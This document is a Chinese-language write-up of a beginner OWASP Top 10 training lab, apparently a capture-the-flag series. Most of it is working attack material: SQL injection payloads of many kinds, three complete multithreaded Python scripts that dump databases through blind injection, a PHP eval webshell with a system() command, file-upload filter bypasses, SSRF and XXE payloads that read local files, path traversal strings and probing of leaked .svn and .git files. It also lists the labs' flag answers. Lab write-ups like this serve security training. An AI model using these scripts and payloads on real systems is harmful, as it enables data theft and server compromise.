初学者训练营_OWASP_TOP10
XSS、CSRF、命令执行太简单就没写
入门SQL注入
数据库语句执行靶场
就是执行sql命令
sql
show databases;
use web;
show tables;
select * from web.flag;
flag{8e179390812e47bb917745f7ca5c10e0}
报错注入-sql注入-数字型
sql
1 and 1=1#
1 and 1=2#
2报错
1 order by 5#
最大是5
sql
1 union select 1,2,3,4,5都可以注入,那还说啥了,秒了
sql
1 union select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()# //爆表
1 union select group_concat(column_name),2,3,4,5 from information_schema.columns where table_schema=database() and table_name="flag"# //爆字段
1 union select group_concat(flag),2,3,4,5 from flag# //flag
报错注入-sql注入-字符型
七个字段
这里记下,字符型注释'-- 后面必须有个空格
猜一手flag在flag表里
猜对了
flag{e743eeb04d124100bf14f5e60e839859}
sql注入-布尔盲注
sql注入-宽字节注入
宽字节注入是一种SQL 注入攻击技术 ,利用多字节字符集 (如GBK、GB2312、Big5等)的编码特性,绕过转义函数(如 addslashes()、mysql_real_escape_string())的保护,实现SQL语句注入。
admin%df' or 1=1#
sql注入-时间盲注-1
1'and sleep(4)--
sql注入-时间盲注-2
双引号
2"and sleep(4)--
sql注入-字符型-1
括号闭合
1') and 1=1--
1') order by 7--
1') union select 1,2,3,4,5,6,7--
1') union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database() --
sql
1') union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name="flag"--
1') union select 1,2,group_concat(flag),4,5,6,7 from flag--flag{d9f44135aa694305b91d28c61a2c4283}
sql注入-字符型-2
sql
1"union select 1,2,3,4,5,6,7--
1" union select 1,database(), group_concat(column_name),4,5,6,7 from information_schema.columns where table_name='flag' --
1" union select 1,database(), group_concat(flag),4,5,6,7 from sql_injection_lab.flag --
sql注入-时间盲注
1 and if(1=1,sleep(5),1)
SQL注入布尔
python
1' AND length(DATABASE())=1#
1' AND LENGTH(DATABASE())=2#
1%20AND%20(SELECT%20LENGTH(DATABASE()))=1
import requests
from concurrent.futures import ThreadPoolExecutor
# ===================== 配置 =====================
base_url = "http://gaacbhe.haobachang2.loveli.com.cn:8888/check?id=1"
MAX_THREAD = 30
CHARSET = range(48, 123)
# ==================================================
def req(payload):
try:
res = requests.get(base_url + payload, timeout=2)
return res.json()["exists"]
except:
return False
# -------------------- 1. 爆库 --------------------
def get_db_len():
for i in range(1, 30):
if req(f" AND (SELECT LENGTH(DATABASE()))={i}"):
print(f"✅ 数据库长度: {i}")
return i
def get_db_name(db_len):
name = [""]*(db_len+1)
def task(pos):
for c in CHARSET:
if req(f" AND ASCII(SUBSTRING(DATABASE(),{pos},1))={c}"):
name[pos] = chr(c)
print(f"第{pos}位: {chr(c)}")
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, db_len+1))
db = "".join(name[1:])
print(f"\n🎉 数据库名: {db}")
return db
# -------------------- 2. 爆表 --------------------
def get_table_count(db):
for i in range(1, 20):
if req(f" AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db}')={i}"):
print(f"✅ 表总数: {i}")
return i
def get_all_tables(db, count):
tables = []
for idx in range(count):
t_len = 0
for i in range(1, 50):
if req(f" AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1))={i}"):
t_len = i
break
t_name = [""]*(t_len+1)
def task(pos):
for c in CHARSET:
if req(f" AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1),{pos},1))={c}"):
t_name[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, t_len+1))
table = "".join(t_name[1:])
tables.append(table)
print(f"✅ 表{idx+1}: {table}")
return tables
# -------------------- 3. 爆【所有字段】 --------------------
def get_all_columns(db, table):
print(f"\n==== 爆破 {table} 所有字段 ====")
cols = []
col_count = 0
for i in range(1,10):
if req(f" AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}')={i}"):
col_count = i
break
print(f"✅ 字段总数: {col_count}")
for idx in range(col_count):
c_len = 0
for i in range(1,50):
if req(f" AND LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1))={i}"):
c_len = i
break
c_name = [""]*(c_len+1)
def task(pos):
for c in CHARSET:
if req(f" AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1),{pos},1))={c}"):
c_name[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, c_len+1))
col = "".join(c_name[1:])
cols.append(col)
print(f"✅ 字段{idx+1}: {col}")
return cols
# -------------------- 4. 爆【真实数据】 --------------------
def get_data(table, col):
print(f"\n==== 爆破 {table}.{col} ====")
d_len = 0
for i in range(1, 100):
if req(f" AND LENGTH((SELECT {col} FROM {table} LIMIT 0,1))={i}"):
d_len = i
break
d_val = [""]*(d_len+1)
def task(pos):
for c in CHARSET:
if req(f" AND ASCII(SUBSTRING((SELECT {col} FROM {table} LIMIT 0,1),{pos},1))={c}"):
d_val[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, d_len+1))
data = "".join(d_val[1:])
print(f"🏆 数据: {data}")
return data
# ===================== 主程序 =====================
if __name__ == '__main__':
db = get_db_name(get_db_len())
tables = get_all_tables(db, get_table_count(db))
for table in tables:
cols = get_all_columns(db, table)
for col in cols:
get_data(table, col)sql注入-时间盲注
F12
1 and if(1=1,sleep(2),null)
sql
1 and if(length(database())=17,sleep(2),null)
1+and+if((select+count(table_name)+from+information_schema.tables+where+table_schema=database())=2,sleep(2),1
1+and+if(length((select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()))>5,sleep(2),1)
1+and+if((select+count(column_name)+from+information_schema.columns+where+table_name='flag')=2,sleep(5),1)
1+and+if(substr((select+group_concat(column_name)+from+information_schema.columns+where+table_name='flag'),1,1)='a',sleep(2),1)
1+and+if(length((select+flag+from+flag))>10,sleep(2),1)
1+and+if(substr((select+flag+from+flag),1,1)='a',sleep(2),1)
python
import requests
import time
from concurrent.futures import ThreadPoolExecutor
# ===================== 配置 =====================
base_url = "http://zj1xpzr.haobachang2.loveli.com.cn:8888/check?id=1"
MAX_THREAD = 20 # 时间盲注线程别太高,避免超时
CHARSET = range(48, 123)
TIME_OUT = 3 # 请求超时时间
SLEEP_TIME = 2 # 盲注睡眠秒数
# ==================================================
def req(payload):
"""时间盲注请求:响应时间 > SLEEP_TIME 则为真"""
try:
start = time.time()
# 时间盲注核心语句
inj = f" AND IF({payload}, SLEEP({SLEEP_TIME}), 0)"
res = requests.get(base_url + inj, timeout=TIME_OUT)
cost = time.time() - start
# 耗时超过设定时间 → 条件成立
return cost >= SLEEP_TIME - 0.1
except:
return False
# -------------------- 1. 爆库 --------------------
def get_db_len():
for i in range(1, 30):
if req(f"(SELECT LENGTH(DATABASE()))={i}"):
print(f"✅ 数据库长度: {i}")
return i
def get_db_name(db_len):
name = [""] * (db_len + 1)
def task(pos):
for c in CHARSET:
if req(f"ASCII(SUBSTRING(DATABASE(),{pos},1))={c}"):
name[pos] = chr(c)
print(f"第{pos}位: {chr(c)}")
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, db_len + 1))
db = "".join(name[1:])
print(f"\n🎉 数据库名: {db}")
return db
# -------------------- 2. 爆表 --------------------
def get_table_count(db):
for i in range(1, 20):
if req(f"(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db}')={i}"):
print(f"✅ 表总数: {i}")
return i
def get_all_tables(db, count):
tables = []
for idx in range(count):
t_len = 0
for i in range(1, 50):
if req(f"LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1))={i}"):
t_len = i
break
t_name = [""] * (t_len + 1)
def task(pos):
for c in CHARSET:
if req(f"ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1),{pos},1))={c}"):
t_name[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, t_len + 1))
table = "".join(t_name[1:])
tables.append(table)
print(f"✅ 表{idx+1}: {table}")
return tables
# -------------------- 3. 爆字段 --------------------
def get_all_columns(db, table):
print(f"\n==== 爆破 {table} 所有字段 ====")
cols = []
col_count = 0
for i in range(1, 10):
if req(f"(SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}')={i}"):
col_count = i
break
print(f"✅ 字段总数: {col_count}")
for idx in range(col_count):
c_len = 0
for i in range(1, 50):
if req(f"LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1))={i}"):
c_len = i
break
c_name = [""] * (c_len + 1)
def task(pos):
for c in CHARSET:
if req(f"ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1),{pos},1))={c}"):
c_name[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, c_len + 1))
col = "".join(c_name[1:])
cols.append(col)
print(f"✅ 字段{idx+1}: {col}")
return cols
# -------------------- 4. 爆数据 --------------------
def get_data(table, col):
print(f"\n==== 爆破 {table}.{col} ====")
d_len = 0
for i in range(1, 100):
if req(f"LENGTH((SELECT {col} FROM {table} LIMIT 0,1))={i}"):
d_len = i
break
d_val = [""] * (d_len + 1)
def task(pos):
for c in CHARSET:
if req(f"ASCII(SUBSTRING((SELECT {col} FROM {table} LIMIT 0,1),{pos},1))={c}"):
d_val[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, d_len + 1))
data = "".join(d_val[1:])
print(f"🏆 数据: {data}")
return data
# ===================== 主程序 =====================
if __name__ == '__main__':
db = get_db_name(get_db_len())
tables = get_all_tables(db, get_table_count(db))
for table in tables:
cols = get_all_columns(db, table)
for col in cols:
get_data(table, col)sql注入-布尔盲注-1
sql
1' and 1=1 or' #
SELECT * FROM user WHERE id='1' and 1=1 or' ' AND status=1
1' and length(database())=17 or' #
WHERE id='1' and length(database())=17 or' ' AND 其他条件
1' AND ASCII(SUBSTRING(DATABASE(),1,1))=115 or' #
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='sql_injection_lab')=2 or' #
' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1))=97 or' #
' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1),1,1))=97 or' #
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag')=1 or' #
' AND LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1))=1 or' #
' AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1),1,1))=97 or' #
' AND LENGTH((SELECT flag FROM flag LIMIT 0,1))=10 or' #
' AND ASCII(SUBSTRING((SELECT flag FROM flag LIMIT 0,1),1,1))=102 or' #
python
import requests
from concurrent.futures import ThreadPoolExecutor
# ===================== 配置 =====================
# base_url 已包含 id=1,payload 不再额外加 1
base_url = "http://i7u7g75.haobachang2.loveli.com.cn:8888/check?id=1"
MAX_THREAD = 20
CHARSET = range(48, 123)
# ==================================================
def req(payload):
try:
res = requests.get(base_url + payload, timeout=3)
return res.json()["exists"]
except:
return False
# -------------------- 1. 爆库 --------------------
def get_db_len():
for i in range(1, 30):
# 去掉开头1,标准格式:' and 条件 or' #
if req(f"' and length(database())={i} or' #"):
print(f"✅ 数据库长度: {i}")
return i
def get_db_name(db_len):
name = [""]*(db_len+1)
def task(pos):
for c in CHARSET:
if req(f"' AND ASCII(SUBSTRING(DATABASE(),{pos},1))={c} or' #"):
name[pos] = chr(c)
print(f"第{pos}位: {chr(c)}")
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, db_len+1))
db = "".join(name[1:])
print(f"\n🎉 数据库名: {db}")
return db
# -------------------- 2. 爆表 --------------------
def get_table_count(db):
for i in range(1, 20):
if req(f"' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='{db}')={i} or' #"):
print(f"✅ 表总数: {i}")
return i
def get_all_tables(db, count):
tables = []
for idx in range(count):
t_len = 0
for i in range(1, 50):
if req(f"' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1))={i} or' #"):
t_len = i
break
t_name = [""]*(t_len+1)
def task(pos):
for c in CHARSET:
if req(f"' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {idx},1),{pos},1))={c} or' #"):
t_name[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, t_len+1))
table = "".join(t_name[1:])
tables.append(table)
print(f"✅ 表{idx+1}: {table}")
return tables
# -------------------- 3. 爆【所有字段】 --------------------
def get_all_columns(db, table):
print(f"\n==== 爆破 {table} 所有字段 ====")
cols = []
col_count = 0
for i in range(1,10):
if req(f"' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}')={i} or' #"):
col_count = i
break
print(f"✅ 字段总数: {col_count}")
for idx in range(col_count):
c_len = 0
for i in range(1,50):
if req(f"' AND LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1))={i} or' #"):
c_len = i
break
c_name = [""]*(c_len+1)
def task(pos):
for c in CHARSET:
if req(f"' AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {idx},1),{pos},1))={c} or' #"):
c_name[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, c_len+1))
col = "".join(c_name[1:])
cols.append(col)
print(f"✅ 字段{idx+1}: {col}")
return cols
# -------------------- 4. 爆【真实数据】 --------------------
def get_data(table, col):
print(f"\n==== 爆破 {table}.{col} ====")
d_len = 0
for i in range(1, 100):
if req(f"' AND LENGTH((SELECT {col} FROM {table} LIMIT 0,1))={i} or' #"):
d_len = i
break
d_val = [""]*(d_len+1)
def task(pos):
for c in CHARSET:
if req(f"' AND ASCII(SUBSTRING((SELECT {col} FROM {table} LIMIT 0,1),{pos},1))={c} or' #"):
d_val[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, d_len+1))
data = "".join(d_val[1:])
print(f"🏆 数据: {data}")
return data
# ===================== 主程序 =====================
if __name__ == '__main__':
db_len = get_db_len()
db_name = get_db_name(db_len)
table_num = get_table_count(db_name)
tables = get_all_tables(db_name, table_num)
for table in tables:
cols = get_all_columns(db_name, table)
for col in cols:
get_data(table, col)sql注入-布尔盲注-2
sql
1" and 1="1
WHERE id="1" and 1="1"
1" and 1="2
WHERE id="1" and 1="2"
1" and length(database())="17
WHERE id="1" and length(database())="17"
1" and ASCII(SUBSTRING(DATABASE(),1,1))="115
WHERE id="1" and ASCII(SUBSTRING(DATABASE(),1,1))="115"
1" and (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='sql_injection_lab')="2
WHERE id="1" and (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='sql_injection_lab')="2"
1" and LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1))="97
WHERE id="1" and LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1))="97"
1" and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1),1,1))="97
WHERE id="1" and ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='sql_injection_lab' LIMIT 1,1),1,1))="97"
1" and (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag')="1
WHERE id="1" and (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag')="1"
1" and LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1))="1
WHERE id="1" and LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1))="1"
1" and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1),1,1))="97
WHERE id="1" and ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema='sql_injection_lab' AND table_name='flag' LIMIT 1,1),1,1))="97"
1" and LENGTH((SELECT flag FROM flag LIMIT 0,1))="10
WHERE id="1" and LENGTH((SELECT flag FROM flag LIMIT 0,1))="10"
1" and ASCII(SUBSTRING((SELECT flag FROM flag LIMIT 0,1),1,1))="102
WHERE id="1" and ASCII(SUBSTRING((SELECT flag FROM flag LIMIT 0,1),1,1))="102"
python
import requests
from concurrent.futures import ThreadPoolExecutor
# ===================== 配置 =====================
base_url = "http://fmg41ar.haobachang2.loveli.com.cn:8888/check?id=1"
MAX_THREAD = 15
CHARSET = range(48, 123)
# ==================================================
def req(payload):
try:
res = requests.get(base_url + payload, timeout=3)
return res.json()["exists"]
except:
return False
# -------------------- 1. 爆库长度 --------------------
def get_db_len():
for i in range(1, 30):
if req(f'" and length(database())="{i}'):
print(f"✅ 数据库长度: {i}")
return i
# -------------------- 2. 爆库名 --------------------
def get_db_name(db_len):
name = [""] * (db_len + 1)
def task(pos):
for c in CHARSET:
if req(f'" AND ASCII(SUBSTRING(DATABASE(),{pos},1))="{c}'):
name[pos] = chr(c)
print(f"第{pos}位: {chr(c)}")
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, db_len + 1))
db = "".join(name[1:])
print(f"\n🎉 数据库名: {db}")
return db
# -------------------- 3. 爆表数量 --------------------
def get_table_count(db):
for i in range(1, 20):
if req(f'" AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\'{db}\')="{i}'):
print(f"✅ 表总数: {i}")
return i
# -------------------- 4. 爆表名 --------------------
def get_all_tables(db, count):
tables = []
for idx in range(count):
t_len = 0
for i in range(1, 50):
if req(f'" AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema=\'{db}\' LIMIT {idx},1))="{i}'):
t_len = i
break
t_name = [""] * (t_len + 1)
def task(pos):
for c in CHARSET:
if req(f'" AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=\'{db}\' LIMIT {idx},1),{pos},1))="{c}'):
t_name[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, t_len + 1))
table = "".join(t_name[1:])
tables.append(table)
print(f"✅ 表{idx+1}: {table}")
return tables
# -------------------- 5. 爆字段 --------------------
def get_all_columns(db, table):
print(f"\n==== 爆破 {table} 所有字段 ====")
cols = []
col_count = 0
for i in range(1,10):
if req(f'" AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_schema=\'{db}\' AND table_name=\'{table}\')="{i}'):
col_count = i
break
print(f"✅ 字段总数: {col_count}")
for idx in range(col_count):
c_len = 0
for i in range(1,50):
if req(f'" AND LENGTH((SELECT column_name FROM information_schema.columns WHERE table_schema=\'{db}\' AND table_name=\'{table}\' LIMIT {idx},1))="{i}'):
c_len = i
break
c_name = [""]*(c_len+1)
def task(pos):
for c in CHARSET:
if req(f'" AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_schema=\'{db}\' AND table_name=\'{table}\' LIMIT {idx},1),{pos},1))="{c}'):
c_name[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, c_len+1))
col = "".join(c_name[1:])
cols.append(col)
print(f"✅ 字段{idx+1}: {col}")
return cols
# -------------------- 6. 爆数据 --------------------
def get_data(table, col):
print(f"\n==== 爆破 {table}.{col} ====")
d_len = 0
for i in range(1, 100):
if req(f'" AND LENGTH((SELECT {col} FROM {table} LIMIT 0,1))="{i}'):
d_len = i
break
d_val = [""]*(d_len+1)
def task(pos):
for c in CHARSET:
if req(f'" AND ASCII(SUBSTRING((SELECT {col} FROM {table} LIMIT 0,1),{pos},1))="{c}'):
d_val[pos] = chr(c)
return
with ThreadPoolExecutor(MAX_THREAD) as t:
t.map(task, range(1, d_len+1))
data = "".join(d_val[1:])
print(f"🏆 数据: {data}")
return data
# ===================== 主程序 =====================
if __name__ == '__main__':
db_len = get_db_len()
db_name = get_db_name(db_len)
table_num = get_table_count(db_name)
tables = get_all_tables(db_name, table_num)
for table in tables:
cols = get_all_columns(db_name, table)
for col in cols:
get_data(table, col)sql注入-POST类型注入-1
sql
admin' or '1'='1
select * from name where = ' UNION SELECT 1,user(),database(),version(),5,6,7 --'
select * from name where = ' UNION SELECT 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema ='sql_injection_lab' -- '
select * from name where =1' UNION SELECT 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name ='flag' -- '
select * from name where =1' UNION SELECT 1,flag,3,4,5,6,7 FROM flag-- '
sql注入-POST类型注入-2
sql
admin"or 1=1#
admin" union select 1,2,3,4,5,6,7#
admin" union select 1,2,database(),4,5,6,7#
admin" union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema='sql_injection_lab'#
admin" union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='flag'#
admin" union select 1,flag,3,4,5,6,7 from flag#
入门文件上传
文件上传漏洞01
随便写个马子
sql
<?php eval($_POST["0"])?>直接利用
你想在前端做出花来吗
上传然后改后缀
我明明做了文件校验了?
MIME
你知道00截断吗
0.php%00.jpg
0=system("cat+/tmp/flag.txt");
文件上传简单绕过2.0
0.jpg.php
包含关键词就行
文件上传简单绕过3.0
0.pphphp
双写绕过
入门SSRF
最简单的PHP-SSRF
Payload
http://0x7f000001/?url=file:///tmp/flag.txt
SSRF不允许使用File协议了1
源码
php
164 <?php
165 if (isset($_GET['url'])) {
166 header("Content-Type: text/html; charset=utf-8");
167 // 接收用户传入的url参数
168 $url = $_GET['url'];
169
170 // 只检测小写file协议,允许大写FILE绕过
171 if (strpos($url, 'file') === 0) {
172 echo "<div class='msg'>不允许使用file协议了!</div>";
173 exit;
174 }
175
176 // 初始化curl,发起请求(SSRF核心漏洞点)
177 $ch = curl_init();
178 curl_setopt($ch, CURLOPT_URL, $url); // 直接将用户输入的URL传入
179 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // 返回结果而非直接输出
180 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // 允许302重定向
181 curl_setopt($ch, CURLOPT_TIMEOUT, 5); // 超时时间5秒
182 $response = curl_exec($ch);
183 if ($response === false) {
184 $error = curl_error($ch);
185 curl_close($ch);
186 echo "<h3>SSRF请求结果:</h3>";
187 echo "<pre>cURL 错误: ".htmlspecialchars($error)."</pre>";
188 } else {
189 curl_close($ch);
190 // 输出响应结果
191 echo "<h3>SSRF请求结果:</h3>";
192 echo "<pre>".htmlspecialchars($response)."</pre>";
193 }
194 }
payload
http://0x7f000001/?url=File:///tmp/flag.txtSSRF不允许使用File协议了2
php
164 <?php
165 if (isset($_GET['url'])) {
166 header("Content-Type: text/html; charset=utf-8");
167 // 接收用户传入的url参数
168 $url = $_GET['url'];
169
170 if (stripos($url, 'file://') === 0) {
171 echo "<div class='msg'>不允许使用file协议了!</div>";
172 exit;
173 }
174
175 // 初始化curl,发起请求(SSRF核心漏洞点)
176 $ch = curl_init();
177 curl_setopt($ch, CURLOPT_URL, $url); // 直接将用户输入的URL传入
178 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // 返回结果而非直接输出
179 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // 允许302重定向
180 curl_setopt($ch, CURLOPT_TIMEOUT, 5); // 超时时间5秒
181 $response = curl_exec($ch);
182 if ($response === false) {
183 $error = curl_error($ch);
184 curl_close($ch);
185 echo "<h3>SSRF请求结果:</h3>";
186 echo "<pre>cURL 错误: ".htmlspecialchars($error)."</pre>";
187 } else {
188 curl_close($ch);
189 // 输出响应结果
190 echo "<h3>SSRF请求结果:</h3>";
191 echo "<pre>".htmlspecialchars($response)."</pre>";
192 }
193 }
194 ?>payload
file:\\/tmp/flag.txt
入门XXE
初级XXE
XML
<?xml version="1.0"?>
<!DOCTYPE data [ <!-- 声明根元素data -->
<!ELEMENT data ANY> <!-- 定义data元素可包含任何内容 -->
<!ENTITY xxe SYSTEM "file:///tmp/flag.txt"> <!-- 定义外部实体 -->
]>
<data> <!-- 实际根元素 -->
<username>&xxe;</username> <!-- 实体引用,显示flag -->
<email>test@example.com</email>
</data>
简单的XXE绕过1
XML
<?xml version="1.0"?>
<!DOCTYPE data [ <!-- 声明根元素data -->
<!ELEMENT data ANY> <!-- 定义data元素可包含任何内容 -->
<!ENTITY xxe SYSTEM "File:///tmp/flag.txt"> <!-- 定义外部实体 -->
]>
<data> <!-- 实际根元素 -->
<username>&xxe;</username> <!-- 实体引用,显示flag -->
<email>test@example.com</email>
</data>XXE盲打
麻烦,懒得做了
入门文件读取
你需要了解什么是路径穿越
XML
../../../../../../tmp/flag.txt任意文件读取的简单绕过1
XML
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/tmp/flag.txt任意文件读取的简单绕过2
XML
....//....//....//....//....///tmp/flag.txt
入门文件包含
文件包含入门
XML
/tmp/flag.txt文件包含,你需要会目录穿越
XML
../../../../tmp/flag.txt文件包含,..被过滤了
XML
....//....//....//....//....///tmp/flag.txt文件包含+上传图片
在上传文件的末尾加上一句话,然后包含图片蚁剑连接
入门文件下载
文件下载
XML
../../../../tmp/flag.txt
入门敏感文件泄露
我有一个备份我网站的好习惯
backup.zip
我喜欢用SVN
访问/.svn/目录,然后找到包含flag的备份文件,去掉.bak直接访问php文件获得flag
我喜欢用SVN-2
/.svn/wc.db
访问获得flag
我喜欢用git
/.git/index,中有3b96e9fc-ae54-46bf-129e30-c167f825d7cf.php,访问获得flag
